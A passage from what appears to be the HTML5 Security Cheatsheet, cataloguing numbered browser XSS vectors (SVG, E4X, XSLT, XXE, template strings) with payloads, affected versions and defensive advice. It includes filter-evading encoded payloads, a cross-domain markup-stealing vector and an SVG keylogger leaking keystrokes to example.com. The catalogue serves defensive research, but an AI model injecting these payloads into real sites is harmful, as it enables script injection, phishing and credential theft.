                                                                The history.pushState() and history.replaceState() API allows to create and modify the user's history. An attacker can use this feature to change the information displayed in the address bar as well as the location DOM object and thus initiate phishing attacks or obfuscate bad intentions. While pushState adds a new history entry, replaceState modifies the current one. This removes nearly all traces of the actual location from the browsing history giving no possibility to navigate back. The information shown in the address bar cannot be trusted anymore as soon as an attacker or a malicious website execute JavaScript.

                                                                <script>history.pushState(0,0,'/i/am/somewhere_else');</script>

                                                                  • Firefox 4.0
                                                                  • Firefox Latest
                                                                  • Chrome 6.0
                                                                  • Chrome Latest
                                                                  • Safari 5.0
                                                                  • Safari Latest
                                                                  • Opera 11.50
                                                                  • Opera Latest
                                                                  • Internet Explorer 10.0
                                                                  • Internet Explorer Latest
                                                                • xss
                                                                • javascript
                                                                • spoofing
                                                                • history
                                                                • phishing
                                                                .mario, freddyb

                                                                Executing JavaScript using ES6 Template Strings#140test

                                                                ES6 specifies a new language feature called "Template Strings" (often also referred to as "Quasi Literals" alongside multi-line strings and others). This allows to execute arbitrary JavaScript code without using parenthesis but back-ticks instead. Inside back-tick delimited strings, placeholders such as ${} can wrap executable code.

                                                                <script> alert`1`; var something = `abc${alert(1)}def`; ``.constructor.constructor`alert\`1\````; </script>

                                                                Make sure that your IDS, filter and other protective systems are aware of the fact, that back-ticks (U+0060) are now capable of initiating execution of methods and functions in JavaScript. Further make sure, that symbols such as ${} cannot be injected into existing template and multi-line strings.

                                                                  • Firefox 34.0
                                                                  • Firefox Latest
                                                                • es6
                                                                • javascript
                                                                • backtick
                                                                • template
                                                                .mario
                                                              • E4X vectors working on gecko based browsers

                                                                Self-including E4X-based JavaScript snippet#25test

                                                                This <SCRIPT> tag tries to include the very same page it is being executed from - and then executes the {}-delimited E4X payload. To avoid having Firefox throw an error during inclusion the ending sequence ;0 is necessary.

                                                                <script src="#">{alert(1)}</script>;1

                                                                E4X is extremely dangerous since any page can include sources providing valid XML and the mentioned semi-colon delimiter. For effective protection websites must be applied with a DOCTYPE - or contain invalid markup. There are many variations for the ending delimiter - as long it is valid JavaScript and not indicating the page is XML only it will work (;1, ,1, ._, etc..)

                                                                  • Firefox 1.5
                                                                  • Firefox 16.0
                                                                • xss
                                                                • javascript
                                                                • firefox
                                                                • e4x
                                                                • self-inclusion
                                                                • proprietary
                                                                .mario

                                                                E4X-based UTF-7 JavaScript/HTML snippet stealing cross-domain markup#26test

                                                                In case an attacker can inject the character sequence beginning with .toXMLString() it's possible to include the victimized website in a <SCRIPT> tag loaded from an arbitrary page and steal the markup of the included page - across domain and protocol borders. Note that the whole vector is encoded in UTF-7. This is possible since the including <SCRIPT> tag can decide via charset attribute what charset to use.

                                                                +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);

                                                                Make sure all sites are being applied with a defined charset like UTF-8. Also incoming data should be converted from UTF-7 before being escaped with htmlentities() or comparable methods. All websites containing sensitive data should be applied with a DOCTYPE.

                                                                  • Firefox 1.5
                                                                  • Firefox 4.0.1
                                                                • xss
                                                                • javascript
                                                                • firefox
                                                                • e4x
                                                                • stealing
                                                                • utf7
                                                                • proprietary
                                                                .mario

                                                                E4X used to close an opening <SCRIPT> tag and create an E4X object at the same time#58test

                                                                This one is tricky. Firefox allows to end an opening <SCRIPT> tag with a new E4X object (<b/>) - already being created in the JavaScript scope at the same time. The alert can happen due to the fact that the additional < introduces a size comparison (<b/> < alert(1)).

                                                                <b><script<b></b><alert(1)</script </b></b>

                                                                  • Firefox 1.5
                                                                  • Firefox 3.6.28
                                                                • xss
                                                                • javascript
                                                                • e4x
                                                                • script
                                                                • parser
                                                                • regex
                                                                .mario

                                                                E4X used to close an opening <SCRIPT> tag and {} evaluation#75test

                                                                In this example an E4X object is being used to close a half-open <SCRIPT> tag and evaluate code in the global scope afterwards via the E4X curly bracket delimiters. This technique will not work anymore as soon Firefox uses the already integrated HTML5 parser (html5.enable=true)

                                                                <script<{alert(1)}/></script </>

                                                                  • Firefox 1.5
                                                                  • Firefox 3.6.28
                                                                • xss
                                                                • javascript
                                                                • e4x
                                                                • script
                                                                • parser
                                                                • regex
                                                                .mario, Gareth
                                                              • Vectors attacking DOM properties and methods

                                                                Self-including DOM Worker XSS#4test

                                                                A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution

                                                                0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))

                                                                  • Firefox 3.5
                                                                  • Firefox 15.0
                                                                • xss
                                                                • dom
                                                                • firefox
                                                                • worker
                                                                • self-inclusion
                                                                • e4x
                                                                .mario

                                                                Firefox crypto object - hidden eval()#5test

                                                                This vector uncovers a hidden eval() inside the Firefox crypto object

                                                                <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>

                                                                  • Firefox 2.X
                                                                  • Firefox 34.0
                                                                • xss
                                                                • dom
                                                                • firefox
                                                                • crypto
                                                                • eval
                                                                • csp
                                                                • proprietary
                                                                .mario
                                                              • JSON based vectors

                                                                Self-hijacking JSON literals#54test

                                                                In case parts of a JSON literal are controlled by user input there's a risk to allow auto-harvesting values from later object members.

                                                                <script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>

                                                                  • Opera 10.0
                                                                  • Opera 10.10
                                                                  • Chrome 4.0
                                                                  • Chrome 6.0
                                                                  • Firefox 1.X
                                                                  • Firefox 3.0.19
                                                                • xss
                                                                • javascript
                                                                • json
                                                                • __definesetter__
                                                                • object
                                                                • prototype
                                                                  .mario
                                                                • Vectors embedded in SVG files

                                                                  SVG executing JavaScript via <G> tag and onload attribute#11test

                                                                  SVG files can execute JavaScript via onload events on any element without user interaction

                                                                  <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>

                                                                  SVG files should not be treated as images - especially when coming to uploads. An SVG file can contain arbitrary HTML data as well as event handlers in native elements

                                                                    • Opera 10.0
                                                                    • Opera 12.0
                                                                    • Chrome 4.0
                                                                    • Chrome 35.0
                                                                    • Firefox 3.0
                                                                    • Firefox 3.6.28
                                                                    • Safari 5.0
                                                                    • Safari 5.1.7
                                                                    • Internet Explorer 9.0
                                                                    • Internet Explorer Latest
                                                                  • xss
                                                                  • svg
                                                                  • onload
                                                                  • opera
                                                                  • firefox
                                                                  • chrome
                                                                  • internet explorer
                                                                  .mario

                                                                  Opera 10 SVG font XSS#43test

                                                                  Opera 10.00 and later minor versions allow using SVG fonts and will - as soon as the font file has loaded even execute embedded JavaScript. The current example utilizes a load event handler to execute the JavaScript without user interaction as soon as the font file has been fully loaded.

                                                                  <?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style> </head> <body>Hello</body> </html>

                                                                  <?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>required_mime: image/svg+xmlcrossdomain: 0path: http://html5sec.org/font.svgname: font.svg
                                                                    • Opera 10.0
                                                                  • xss
                                                                  • javascript
                                                                  • opera
                                                                  • svg
                                                                  • font
                                                                  • svgfont
                                                                    .mario

                                                                    SVG file executing JavaScript via <SCRIPT> tag#47test

                                                                    SVG files can force the user agent to execute JavaScript via plain <SCRIPT> tags inside any SVG element without user interaction

                                                                    <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>

                                                                    SVG files should not be treated as images - especially when coming to uploads. An SVG file can contain arbitrary HTML data as well as event handlers in native elements

                                                                      • Opera 10.X
                                                                      • Opera Latest
                                                                      • Chrome 4.0
                                                                      • Chrome Latest
                                                                      • Firefox 3.X
                                                                      • Firefox Latest
                                                                      • Internet Explorer 9.0
                                                                      • Internet Explorer Latest
                                                                      • Safari 5.0
                                                                      • Safari Latest
                                                                    • xss
                                                                    • svg
                                                                    • script
                                                                    • opera
                                                                    • firefox
                                                                    • chrome
                                                                    • internet explorer
                                                                      Romain

                                                                      SVG element allows automatic execution of onload attribute without other SVG elements.#65test

                                                                      SVG tags allow code to be executed with onload without any other elements. This makes for a very short and effective XSS vector, useful in many situations.

                                                                      <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>

                                                                      Not really a bug to fix, this is desired behaviour and only increases XSS scope.

                                                                        • Chrome 4.0
                                                                        • Chrome Latest
                                                                        • Safari 3.4
                                                                        • Safari Latest
                                                                        • Firefox 2.0
                                                                        • Firefox Latest
                                                                        • Opera 9.X
                                                                        • Opera Latest
                                                                        • Internet Explorer 9.0
                                                                        • Internet Explorer Latest
                                                                      • xss
                                                                      • svg
                                                                      • onload
                                                                      • chrome
                                                                      • firefox
                                                                      • safari
                                                                      • opera
                                                                      gareth

                                                                      SVG simple passive JavaScript execution via XLink#87test

                                                                      Browsers that support SVG, forced to support XLink. The parameter of the attribute "xlink:actuate" for <a> tag is fixed - "onRequest".

                                                                      <svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a> </svg>

                                                                        • Chrome 4.0
                                                                        • Chrome Latest
                                                                        • Safari 3.4
                                                                        • Safari Latest
                                                                        • Firefox 3.0
                                                                        • Firefox Latest
                                                                        • Opera 9.X
                                                                        • Opera Latest
                                                                        • Internet Explorer 6.0
                                                                        • Internet Explorer Latest
                                                                      • xss
                                                                      • svg
                                                                      • passive
                                                                      • xlink
                                                                      • chrome
                                                                      • firefox
                                                                      • safari
                                                                      • opera
                                                                      LeverOne

                                                                      SVG active JavaScript execution via XLink in Opera#88test

                                                                      The content of the xml-links will be automatically included in the current document. The combination of "onLoad" (value of xlink:actuate) and "embed" (value of xlink:show) forms of potentially unsafe SVG-elements.

                                                                      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:alert(1)"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:alert(1)"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/> </svg>

                                                                        • Opera 9.X
                                                                        • Opera 12.0
                                                                      • xss
                                                                      • svg
                                                                      • active
                                                                      • xlink
                                                                      • opera
                                                                      LeverOne

                                                                      SVG event handler injection via "set" and "animate"#89test

                                                                      Google Chrome and Safari support binding an event handler using the elements <set> or <animate>. The attribute value is the actually bound event while the "to" attribute value holds the payload. The problem has been fixed in recent Chrome versions.

                                                                      <svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(1)"/> <animate attributeName="onunload" to="alert(1)"/> </svg>

                                                                        • Chrome 4.0
                                                                        • Chrome 10.0
                                                                        • Safari 3.4
                                                                        • Safari 4.0.3
                                                                      • xss
                                                                      • svg
                                                                      • event
                                                                      • safari
                                                                      • chrome
                                                                      LeverOne

                                                                      Using SVG element <handler>#94test

                                                                      Specification SVG Tiny 1.2 provides an element <handler>, which is a "bridge" between SVG and XML-events. This element can contain regular JavaScript.

                                                                      <svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>

                                                                        • Opera 10.0
                                                                        • Opera 12.0
                                                                      • xss
                                                                      • svg
                                                                      • opera
                                                                      • XML-events
                                                                      LeverOne

                                                                      Using SVG element <feImage> and animated data URIs#95test

                                                                      SVG allows using filter effects to be applied on arbitrary visible SVG elements. The feImage filter allows inclusion of other files - as well as data URIs. With a maliciuosly crafted data URI it's possible to execute JavaScript without user interaction. List all of the elements which can be animated can be found in the specified documentation.

                                                                      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage> </svg>

                                                                      Make sure that user submitted SVG data and SVG files are treated as XML documents - not as images. The nature of SVG allows to include almost arbitrary XML data including JavaScript leading to XSS or worse.

                                                                        • Opera 10.0
                                                                        • Opera 12.0
                                                                      • xss
                                                                      • svg
                                                                      • opera
                                                                      • filter effects
                                                                      • feimage
                                                                      .mario

                                                                      Executing JavaScript in SVG Tiny 1.2 without user interaction#104test

                                                                      Opera - providing advanced support for SVG Tiny 1.2 targeting mobile devices - allows to execute JavaScript without user interaction via arbitrary tags. The tag is being applied with a handler pointing to a data URI containing the actual handler. Important is the hash at the end of the data URI to identify the corrrect handler. It is also possible to refer to an element contained in the SVG by its ID or an external resource.

                                                                      <svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>

                                                                        • Opera 10.X
                                                                        • Opera 12.0
                                                                      • xss
                                                                      • javascript
                                                                      • svg
                                                                      • tinysvg
                                                                      • listener
                                                                      • xml
                                                                      • events
                                                                      .mario

                                                                      SVG payload obfuscation with gzipped HTML and MIME type image/svg-xml#105test

                                                                      Opera allows displaying compressed SVG images without the usually necessary encoding header. This works for almost arbitrary data as long as the content type image/svg+xml is set - or image/svg-xml like in this example. Notice that the compressed data can be truncated. Opera will still accept it and render the <script> tag and execute the alert(1) - most other Gzip parsers will break though - rendering any WAF or similar tool trying to analyze the payload useless (gzip 1.3.12 states the payload contains 50+ MB of binary gibberish). The example contains no actual SVG code - just a regular <script> tag with a XHTML namespace attribute.

                                                                      <iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>

                                                                        • Opera 10.X
                                                                        • Opera 12.0
                                                                      • xss
                                                                      • javascript
                                                                      • svg
                                                                      • svgz
                                                                      • gzip
                                                                      • xml
                                                                      • compression
                                                                      .mario

                                                                      Passive SVG JavaScript execution via style injection (1)#109test

                                                                      SVG supports several new CSS properties (clip-path, fill, filter, marker, marker-end, marker-mid, marker-start, mask, stroke), which can refer to external SVG-resources. These properties can also act as separate attributes. Within the external SVG can contain information to animate the current SVG-document. Example shows an animation links, but the possibilities of animation and other elements. Note that Opera does not show the user the change of links address, if the cursor does not go beyond it.

                                                                      <svg xmlns="http://www.w3.org/2000/svg"> <a id="x"><rect fill="white" width="1000" height="1000"/></a> <rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> </svg>

                                                                      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:alert(1)" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:alert(2)" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:alert(3)" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="javascript:alert(1)" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:alert(2)" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:alert(3)" /> </linearGradient> </svg>required_mime: image/svg+xmlcrossdomain: 1path: http://html5sec.org/test3.svgname: test3.svg
                                                                        • Opera 10.X
                                                                        • Opera 12.0
                                                                      • xss
                                                                      • javascript
                                                                      • svg
                                                                      • css
                                                                      • xml
                                                                      • style
                                                                      LeverOne

                                                                      Passive SVG JavaScript execution via style injection (2)#110test

                                                                      This example shows how SVG markers allow insertion of external links with JavaScript URI into the current document.

                                                                      <svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>

                                                                      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>required_mime: image/svg+xmlcrossdomain: 1path: http://html5sec.org/test4.svgname: test4.svg
                                                                        • Opera 10.X
                                                                        • Opera 11.52
                                                                      • xss
                                                                      • javascript
                                                                      • svg
                                                                      • css
                                                                      • xml
                                                                      • style
                                                                        LeverOne

                                                                        SVG chameleon behavior via embedded XSLT#125test

                                                                        This SVG chameleon file can be embedded via <embed> on most, and via <img> on most modern browsers. Thanks to the embedded XSLT stylesheet, it will change it's appearance, depending on how it is embedded or displayed. In an <img> tag it just shows a red dot. But opened directly or via an <iframe> or <embed>, the XSLT turns all SVG into (X)HTML and an alert will show. While most modern browsers show this behavior, Opera will completely mess it up, and show an alert when used via <embed> and an <iframe> when used via <img> (!). Chrome will show a broken image and an alert.

                                                                        <?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>

                                                                          • Internet Explorer 9.0
                                                                          • Internet Explorer Latest
                                                                          • Firefox 3.X
                                                                          • Firefox Latest
                                                                        • svg
                                                                        • html
                                                                        • chameleon
                                                                        • xslt
                                                                        • embedded
                                                                        • xss
                                                                        .mario

                                                                        JavaScript execution on Opera via listener delegation#127test

                                                                        The example vector - relating to #94 - shows how a combination of listener and hander tags can be used to delegate a load event from the SVG element to trigger actual JavaScript execution. So far only Opera supports the usage of XML events and related elements in this context. No user interaction is required to execute the JavaScript.

                                                                        <svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>

                                                                          • Opera 9.0
                                                                          • Opera 12.0
                                                                        • svg
                                                                        • opera
                                                                        • xml
                                                                        • events
                                                                        • listener
                                                                        • handler
                                                                        • xss
                                                                        .mario

                                                                        Firefox parsing entity encoded HTML in SVG#128test

                                                                        Firefox 4 allows HTML entities used in plain-text tags such as style, nostyle, noframes and others to represent their canonical form. This leads to possibilities bypassing filters despite of proper HTML encoding as the example demonstrates - especially when inline SVG and innerHTML copy access are being used. This bug has been fixed in most recent Firefox versions.

                                                                        <svg><style>&lt;img/src=x onerror=alert(1)// </b>

                                                                          • Firefox 4.0
                                                                        • svg
                                                                        • xss
                                                                        • inline
                                                                        • entities
                                                                        • firefox
                                                                        • css
                                                                        • xml
                                                                        • innerhtml
                                                                        .mario

                                                                        Opera active JavaScript execution via STYLE in SVG#129test

                                                                        Additional to script execution via "xlink:href" in SVG elements such as <image>, <animation>, <foreignObject>, Opera 11 allows to utilize filters (as well as other CSS properties listed in #109) to accomplish the same. Note that either these CSS properties, as well as the analogous attributes (the filter attribute in particular) can be used in this case. Both style and analogous attributes in inline SVG should be considered unsafe.

                                                                        <svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'> <!-- Same effect with <image filter='...'> --> </svg>

                                                                        Do not allow style and filter attributes inside user generated SVG data. It's considerably the best to generally avoid user generated SVG data - if possible.

                                                                          • Opera 11.60
                                                                          • Opera 12.0
                                                                        • svg
                                                                        • xss
                                                                        • inline
                                                                        • opera
                                                                        • css
                                                                        • style
                                                                        LeverOne

                                                                        SVG <set> and <animate> elements allow key-logging w/o JavaScript#132test

                                                                        It is possible to achieve an injection capable to exfiltrate keyboard events without any JavaScript execution via SVG and set/animate timing attributes. In essence, an access key can be specified to trigger events inside an SVG. In case an inline SVG is being used, the listener for these keys observes the whole document - and not just the SVG itself. This means that even keystrokes into a form input trigger the SVG access key handler. Once this access key handler is being combined with adding a new keystroke-depending image source to an existing image, the form input will be filled, and the SVG will reset a hidden image source according to the key being pressed and thereby silently exfiltrate the data. Since all this works without using any JavaScript, it was also possible to execute this attack in latest Thunderbird versions - with the vector invisibly wrapped inside the mail-body. The problem has been reported and fixed, CVE-2011-3663 has been assigned. Current stable versions of Firefox still allow to observe the problem - using a network traffic monitor/Firebug is recommended.

                                                                        <!doctype html> <form> <label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> <br> <input name="secret" type="password"> </form> <!-- injection --><svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image> </svg>

                                                                          • Firefox 4
                                                                          • Firefox Latest
                                                                        • svg
                                                                        • html5
                                                                        • noscript
                                                                        • keylogger
                                                                        • firefox
                                                                        • thunderbird
                                                                        .mario

                                                                        Executing JavaScript via "from" attribute in SVG and inline-SVG#137test

                                                                        It is commonly known, that the <animate> element in combination with the "to" parameter can be used to change existing attributes to potentially active values and cause arbitrary script execution. It is nevertheless also possible to use the "from" attribute for the very same purpose - albeit this being rather counter-intuitive. The given example code snippet describes an SVG containing a circle that encapsulates an <animate> element. This uses the "from" attribute to set the "href" attribute of the link encapsulating the circle to a JavaScript URI. Clicking the circle will execute the JavaScript.

                                                                        <svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>

                                                                        Avoid inline-SVG in combination with user-generated content. In case SVG needs to be used, avoid potentially harmful content for "to", "from", "values" and "by" attributes.

                                                                          • Firefox 25.0
                                                                          • Firefox Latest
                                                                          • Opera 15.0
                                                                          • Opera Latest
                                                                          • Chrome 30.0
                                                                          • Chrome Latest
                                                                          • Safari 5.0
                                                                          • Safari Latest
                                                                        • html5
                                                                        • svg
                                                                        • from
                                                                        • inline
                                                                        • xss
                                                                        • passive
                                                                        .mario

                                                                        Executing JavaScript using ES6 Template Strings in SVG#141test

                                                                        The new language features shown in #140 can also be used in the context of an SVG image. Here, the named entity of the back-tick, the &DiacriticalGrave; can be used to initiate execution of a function or method.

                                                                        <svg><script> alert&DiacriticalGrave;1&DiacriticalGrave; <p> <svg><script> alert&grave;1&grave; <p>

                                                                        Make sure that your IDS, filter and other protective systems are aware of the fact, that in SVG, HTML-encoded back-ticks (U+0060) are now capable of initiating execution of methods and functions in JavaScript.

                                                                          • Firefox 34.0
                                                                          • Firefox Latest
                                                                        • es6
                                                                        • javascript
                                                                        • backtick
                                                                        • template
                                                                        • svg
                                                                        .mario
                                                                      • Vectors related to X(HT)ML

                                                                        Opera XML-stylesheets executing JavaScript#17test

                                                                        Opera 9.x and 10.0 allow to apply XML-stylesheets with JavaScript URIs and. The vectors even works if the page is delivered as text/html.

                                                                        <?xml-stylesheet href="javascript:alert(1)"?><root/>

                                                                        Make sure that user input cannot contain XML stylesheets or tags not consisting of <\w+ - because this vector would only be matched via <\?\w+ but still executes JavaScript without user interaction. Avoid blacklists is possible.

                                                                          • Opera 9.X
                                                                          • Opera 10.10
                                                                        • xss
                                                                        • javascript
                                                                        • opera
                                                                        • xml
                                                                        • css
                                                                        • proprietary
                                                                          .mario

                                                                          Entities inside <SCRIPT> and comparable tags#18test

                                                                          By specification user agents allow using HTML entities between <SCRIPT> and <STYLE> tags in case the document is being delivered and rendered as X(HT)ML.

                                                                          <script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>

                                                                          Make sure filters and detection systems consider the fact of having entities to be allowed inbetween <SCRIPT>, <STYLE> and other tags - and not only in attributes.

                                                                            • Opera 8.X
                                                                            • Opera Latest
                                                                            • Firefox 1.X
                                                                            • Firefox Latest
                                                                            • Chrome 3.0
                                                                            • Chrome Latest
                                                                            • Safari 5.0
                                                                            • Safari Latest
                                                                            • Internet Explorer 9.0
                                                                            • Internet Explorer Latest
                                                                          • xss
                                                                          • javascript
                                                                          • opera
                                                                          • internet explorer
                                                                          • firefox
                                                                          • chrome
                                                                          • safari
                                                                          • xml
                                                                          • entity
                                                                            .mario

                                                                            Arbitrary payload injection via XML External Entities (XXE)#64test

                                                                            Chrome and Safari allow using external XML entities to reference payload for an entity. The example shows that the entity &x; is now being filled with the content of the given file. The document must be delivered as XML or XHTML. Note that the absolute URL for the source of XXE is required.

                                                                            <!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>

                                                                            In case an attacker can inject data into the DOCTYPE area of the targeted website it's easy to fool filtering mechanisms since the actual payload is hidden in a harmless looking entity. Make sure no injections in that area are possible.

                                                                            <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>crossdomain: 0path: http://html5sec.org/test.xxename: test.xxe
                                                                              • Chrome 3.0
                                                                              • Chrome Latest
                                                                              • Opera 16.0
                                                                              • Opera Latest
                                                                              • Safari 3.0
                                                                              • Safari Latest
                                                                            • xss
                                                                            • javascript
                                                                            • xxe
                                                                            • safari
                                                                            • chrome
                                                                            • xml
                                                                            • entities
                                                                            • doctype
                                                                            .mario

                                                                            Opera XML-stylesheets executing JavaScript (2)#66test

                                                                            Opera supports xml-stylesheet via data URIs. There are many ways to execute javascript using the XSL (XSLT). If you put this code in an external file on the same domain, then it will work in all browsers. It is also possible appeal to the code of the stylesheet by id (href = "#xss"), when the stylesheet implemented in the current document.

                                                                            <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>

                                                                              • Opera 8.0
                                                                              • Opera 12.0
                                                                            • xss
                                                                            • javascript
                                                                            • opera
                                                                            • xslt
                                                                            • xsl
                                                                            • stylesheet
                                                                            • xml
                                                                              LeverOne

                                                                              XML ATTLIST declaration causing JavaScript execution#67test

                                                                              XML ATTLIST declarations can be used to create attributes and assign values for matching tags inside the DOCTYPE declaration. By chosing the right namespace and attribute combinations it's possible to create an ATTLIST declaration causing JavaScript execution without user interaction.

                                                                              <!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />

                                                                              In case a website is being delivered as XML or XHTML make sure an attacker has no possibility to inject data into the DOCTYPE or create new ATTLIST directives.

                                                                                • Chrome 4.0
                                                                                • Chrome Latest
                                                                                • Safari 3.0
                                                                                • Safari Latest
                                                                                • Firefox 3.0
                                                                                • Firefox Latest
                                                                                • Opera 8.0
                                                                                • Opera Latest
                                                                              • xss
                                                                              • javascript
                                                                              • opera
                                                                              • attlist
                                                                              • doctype
                                                                              • chrome
                                                                              • firefox
                                                                              • safari
                                                                              .mario

                                                                              Passive JavaScript execution via XLinks#68test

                                                                              Gecko based browsers like Firefox allow using XLinks. Those can be equipped with a JavaScript URI to execute JavaScript in case the user clicks on one of those XLinks.

                                                                              <doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>

                                                                                • Firefox 3.0
                                                                                • Firefox 3.6.28
                                                                              • xss
                                                                              • javascript
                                                                              • xlink
                                                                              • firefox
                                                                              • xml
                                                                              .mario

                                                                              Opera WML JavaScript execution via timer event#69test

                                                                              Opera supports WML files - Wireless Markup Language. As soon as a file has the extension .wml Opera assumes it's a WML and renders it accordingly. With a timer event and a connected redirect it's possible to execute JavaScript without user interaction.

                                                                              <card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>

                                                                                • Opera 9.X
                                                                                • Opera 12.0
                                                                              • xss
                                                                              • javascript
                                                                              • wmlscript
                                                                              • wml
                                                                              • opera
                                                                              • mobile
                                                                              • timer
                                                                              .mario

                                                                              Arbitrary payload injection via XML external DTD in IE#76test

                                                                              IE will render doctype-provided entities in the "html" namespace as soon as a user defined XML stylesheet tag is present. The example works up to IE8 standards mode.

